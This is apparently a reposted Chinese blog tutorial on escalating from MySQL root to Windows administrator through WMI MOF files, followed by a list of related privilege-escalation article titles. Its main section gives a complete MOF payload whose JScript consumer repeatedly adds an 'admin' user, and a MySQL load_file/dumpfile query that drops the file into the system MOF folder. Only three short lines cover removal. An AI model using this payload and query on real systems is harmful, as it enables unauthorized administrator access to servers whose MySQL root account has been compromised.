mysql提權之mof詳解
一、
Windows管理規範(WMI)提供瞭如下三種方法編譯WMI儲存庫的託管物件格式(MOF)檔案:
- 將MOF檔案執行為命令列引數及
Mofcomp.exe
檔案 - 使用
IMofCompiler
介面和$CompileFile
方法 - 拖放到
%SystemRoot%\System32\Wbem\MOF
資料夾下的MOF檔案中
注意:
- 使用MOF提權的前提是當前root賬戶可以複製檔案到 %SystemRoot%\System32\Wbem\MOF目錄下。
- Microsoft 建議您到儲存庫編譯 MOF 檔案使用前兩種方法。也就是執行 Mofcomp.exe 檔案,或使用 IMofCompiler::CompileFile 方法。第三種方法僅為向後相容性與早期版本(win2003)的 WMI 提供,並因為此功能可能不會提供在將來的版本後,不應使用。
二、
- 將以下程式碼儲存為
nullevt.mof
檔案
#pragma namespace("\\.\root\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
- 找個可寫目錄,上傳或新建mof檔案
- 通過MySQL查詢將檔案匯入
select load_file('C:\\www\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
注意這裡C:\\www\\nullevt.mof是你上傳mof檔案的隨意路徑,但後面的那個路徑是固定的
匯入後,系統會自動不停的執行該檔案。
三、
解決辦法:
- 第一
net stop winmgmt
停止服務, - 第二 刪除資料夾:
C:\WINDOWS\system32\wbem\Repository\
- 第三
net start winmgmt
啟動服務
相關文章
- MySQL資料庫Root許可權MOF方法提權研究MySql資料庫
- mysql UDF提權MySql
- MySQL UDF 提權初探MySql
- Linux 提權-MySQL UDFLinuxMySql
- MySQL 許可權詳解MySql
- MySql之EXPLAN詳解MySql
- Powershell之MOF後門
- 許可權框架之Shiro詳解框架
- Linux提權————利用SUID提權LinuxUI
- Mysql滲透及提權,命令執行MySql
- Linux利用UDF庫實現Mysql提權LinuxMySql
- Mysql調優之profile詳解MySql
- mysql之my.cnf詳解MySql
- 滲透之——資料庫提權資料庫
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- [MySQL 優化] Explain 之 type 詳解MySql優化AI
- MySQL之SQL優化詳解(二)MySql優化
- MySQL之SQL優化詳解(三)MySql優化
- MySQL之SQL優化詳解(一)MySql優化
- Linux提權-70種sudo提權彙總Linux
- windows提權--組策略首選項提權Windows
- Linux 提權Linux
- 本地提權
- Linux提權Linux
- 詳細解讀阿里手冊之MySQL阿里MySql
- Linux sudo 提權之軟連結攻擊Linux
- 深入理解mysql之left join 使用詳解MySql
- linux sudo提權Linux
- Linux 提權-CapabilitiesLinux
- windows提權 (一)Windows
- SQL Sever提權SQL
- windows伺服器安全設定之提權篇Windows伺服器
- Windows令牌竊取提權和爛土豆提權學習Windows
- UAV MOF工作原理之Agent注入機制原理
- django開發之許可權管理(一)——許可權管理詳解(許可權管理原理以及方案)、不使用許可權框架的原始授權方式詳解Django框架
- MySQL進階【八】—— MySQL優化之my.conf配置詳解MySql優化
- Windows提權實戰——————1、IIS6.exe提權實戰Windows
- Linux提權————Linux下三種不同方式的提權技巧Linux